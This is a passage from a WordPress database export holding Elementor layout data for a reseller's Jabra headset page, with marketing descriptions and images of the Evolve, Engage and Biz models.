\\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"175e85c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"519e230\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6bfb90c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2877 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD_Duo.png\\\" alt=\\\"\\\" width=\\\"188\\\" height=\\\"188\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9e4889b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b26b188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"solution-group-card__product-name ng-binding\\\" style=\\\"text-align: center;\\\"><strong>Jabra Biz 2300 QD DUO<\\/strong><\\/h2><p>Jabra Biz\\u2122 2300 QD Duo is a duo headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ec1e2e4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7187165\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8d1d85b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 1500<\\/strong><\\/h2><p>The Jabra BIZ 1500 is an entry level, low cost professional corded headset built for cost conscious contact centers. With noise cancellation technology, background noise is reduced providing a more professional customer experience on every call.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b92f5f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6008c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2879 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_1500_DUO_QD.png\\\" alt=\\\"\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e34ebbb\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"48b05fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cb3f7ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\"><img class=\\\" wp-image-2878 alignnone\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_1500_DUO_USB.png\\\" alt=\\\"\\\" width=\\\"190\\\" height=\\\"190\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"73b78bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9a82801\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 1500 DUO USB<\\/strong><\\/h2><p>Cost Efficient Professional Corded Headset for Softphone.A duo headset that provides USB connectivity to laptops for softphone use. Comes with a control unit for easy control of volume and mute when on a call.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a829b4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3b4834e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b38b08e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e8e065f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7b07964\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8530,3648,'_elementor_version','2.5.14'),(8596,3654,'_edit_lock','1571992120:1'),(8540,3650,'_wp_page_template','template-fullwidth.php'),(8541,3650,'_elementor_edit_mode','builder'),(8542,3650,'_elementor_template_type','post'),(8543,3650,'_elementor_data','[{\"id\":\"9b05eed\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e3e83dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"272a30b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1 style=\\\"text-align: center;\\\"><strong>Jabra<\\/strong><\\/h1><h3 style=\\\"text-align: center;\\\">Sound that\\u2019s engineered for you<\\/h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those you\\u2019re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.<\\/p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba72cc4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c728c08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"63d6963\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra Evolve Series<\\/h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"828f173\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"03\",\"right\":\"03\",\"bottom\":\"03\",\"left\":\"03\",\"isLinked\":true},\"border_color\":\"#4f4f4f\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[{\"id\":\"1f337bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":28.919,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"9a63143\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve.jpg\",\"id\":2851},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"05c6f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":71.081,\"margin\":{\"unit\":\"px\",\"top\":\"43\",\"right\":\"43\",\"bottom\":\"43\",\"left\":\"43\",\"isLinked\":true}},\"elements\":[{\"id\":\"5625496\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Better concentration, greater productivity<\\/h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.<\\/p><ul><li>World-class speakers to deliver amazing sound for calls and music.<\\/li><li>Call-management features allow for incredible ease-of-use..<\\/li><li>Compatible with all leading UC platforms.<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"337d102\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\"},\"elements\":[{\"id\":\"1b419c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b34a6f3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"41e7d34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"01d0215\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"background_color\":\"#f9f9f9\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"40f3597\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 65t<\\/strong><\\/h2><p>The Jabra Evolve 65t are the world\\u2019s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGels\\u2122 for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\",\"_background_background\":\"classic\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e503076\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"54e8d0f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone wp-image-2852 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/JabraEvolve65t_ProductImage.png\\\" alt=\\\"\\\" width=\\\"163\\\" height=\\\"163\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"716ef9e\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"e8ecb8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93ab181\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2853 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_80.png\\\" alt=\\\"\\\" width=\\\"203\\\" height=\\\"203\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2ea5436\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"242de0e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 80<\\/strong><\\/h2><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f4bed1d\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"07d43f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c84f84f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 75e<\\/strong><\\/h2><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation \\u2013 but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de05f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93f376b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2854 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Evolve75e.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e653f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"ab57536\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f104529\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2855 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\\\" alt=\\\"\\\" width=\\\"201\\\" height=\\\"201\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8392c16\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"d1ec16d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"ng-binding ng-scope\\\" style=\\\"text-align: center;\\\"><strong>Jabra Evolve 75<\\/strong><\\/h2><p class=\\\"ng-binding ng-scope\\\">Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise \\u2013 and need mobility around the workspace. Move up to 100ft\\/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e4c0a5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d8290d\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"97dea23\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 65 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f0731e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89a0b3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2856 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_65.png\\\" alt=\\\"\\\" width=\\\"203\\\" height=\\\"203\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"815f5e9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"5a46717\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"434120f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone  wp-image-2857 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\\\" alt=\\\"\\\" width=\\\"209\\\" height=\\\"209\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"910e26f\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"5e871e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 40 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"facd86c\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"44d8d74\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"7ce9531\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 30 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8213047\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e63500c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone  wp-image-2859 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20.png\\\" alt=\\\"\\\" width=\\\"200\\\" height=\\\"200\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9153a12\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"c643e7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f45227\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2859 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20.png\\\" alt=\\\"\\\" width=\\\"216\\\" height=\\\"216\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af9877f\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"e3a1d98\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 20 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"801e577\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"9929e95\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"ff8dfcd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 20 SE<\\/strong><\\/h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f15601\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ef4be63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2867 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20_SE_Mono.png\\\" alt=\\\"\\\" width=\\\"204\\\" height=\\\"204\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5a94b95\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"ca1cdef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1a49967\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2870 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Engage_50_3.png\\\" alt=\\\"\\\" width=\\\"219\\\" height=\\\"249\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3dd0dc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"33c6633\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Engage 50<\\/strong><\\/h2><p>Is your contact center moving, or considering moving, to softphones? Are you investing in contact center platform \\u2013 whether on-premise or cloud-based? The Jabra Engage 50 is the ideal digital headset to power your customer satisfaction.<\\/p><p>The Jabra Engage 50 features a powerful processing chip in the earcup that delivers advanced functionality including call analytic data.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3befa73\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a85e5e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3d60555\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48b3240\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"89270cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fd3b8a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2><strong>Jabra Biz Wired Series<\\/strong><\\/h2><h3>The Jabra Biz has an extremely lightweight and unobtrusive design.<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d449904\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"656485e\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"fbc0249\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2400 II<\\/strong><\\/h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9369d27\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83ee6d0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2873 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Biz_2400_II.png\\\" alt=\\\"\\\" width=\\\"179\\\" height=\\\"179\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0dd5280\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"66a6f72\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0fd4de1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2875 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/jabra_biz_2400_ii_mono_3-in-1.jpg\\\" alt=\\\"\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e37a9d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f989140\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">Jabra BIZ 2400 II Mono 3-in-1<\\/h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"38cc4d8\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"a2798fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cb65d6a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2400 II DUO<\\/strong><\\/h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" 